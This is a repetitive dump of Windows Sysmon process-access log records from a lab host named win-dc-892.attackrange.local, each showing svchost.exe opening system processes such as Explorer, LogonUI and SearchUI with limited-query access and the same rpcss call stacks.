12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 